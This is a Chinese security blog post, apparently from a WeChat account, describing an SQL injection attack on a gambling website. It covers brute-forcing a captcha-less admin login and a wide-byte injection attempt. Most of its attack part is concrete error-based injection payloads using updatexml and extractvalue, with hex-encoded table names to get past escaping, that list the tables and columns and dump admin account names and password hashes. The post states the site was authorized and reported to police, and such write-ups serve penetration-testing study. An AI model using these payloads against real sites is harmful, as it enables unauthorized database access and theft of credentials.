BC网站SQL注入

声明：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。文章内的网站均已经过授权及备案，违法的事别干嗷

大家好，今天给大家分享的是sunwear某BC站

信息搜集到位

fofa和站长搜集到真实ip，后台地址

居然还没有验证码，这BC太草率了吧，估计要被老板打死了

直接爆破进入后台，管理的还挺多

嗯？没有会员数据

在后台打了半天 没getshell成功 换个思路 去前台看看

在登录接口尝试突破

可以看到这里单引号被添加了反斜杠转义并且没有将password带入一起查询，思路就是尝试宽字节注入，把反斜杠吞掉：

1%df'


应该是闭合成功了，但是仍然注不出数据来。好在天无绝人之路，发现另一个接口

这里也是加了反斜杠，但是它是数字型的，而且看到是用括号来闭合

没问题，成功闭合。我一开始是直接联合注入，得到列数为9

但是联合查询也注不出数据，无论怎么查都是不返回要查询的数据，请看

那就用报错注入来查?id=0)+and+updatexml(1,concat(0x7e,database(),0x7e),1)%23得到数据库是“niu”

查表，查列，dump数据就是简单的流程，直接给payload了，需要注意的是，这里表名一定要用HEX编码一下，不然会被转义，updatexml函数只会显示前32位，要获取完整的密码hash就要换个函数，用extractvalue

# 查表得到（admin,article,type,bank.....）?id=0)+and+updatexml(1,concat(0x7e,(select+group_concat(table_name)from+information_schema.tables+where+table_schema=database()),0x7e),1)+%23# 查列得到（id,account,password,identifier.....）?id=0)+and+updatexml(1,concat(0x7e,(select+group_concat(column_name)from+information_schema.columns+where+table_name=0x61646d696e),0x7e),1)%23# dump?id=0)+and+extractvalue(0x0a,concat(0x0a,(select+concat(account,0x3a,password)+from+niu.admin+limit+0,1)))%23

手工测试结束，为什么不用sqlmap呢，别急，我只是想复习复习手工注，最后用sqlmap跑一下

收工,交给蜀黍处理

站岗小狗，为您服务

原文始发于微信公众号（HexaGoners）：BC网站SQL注入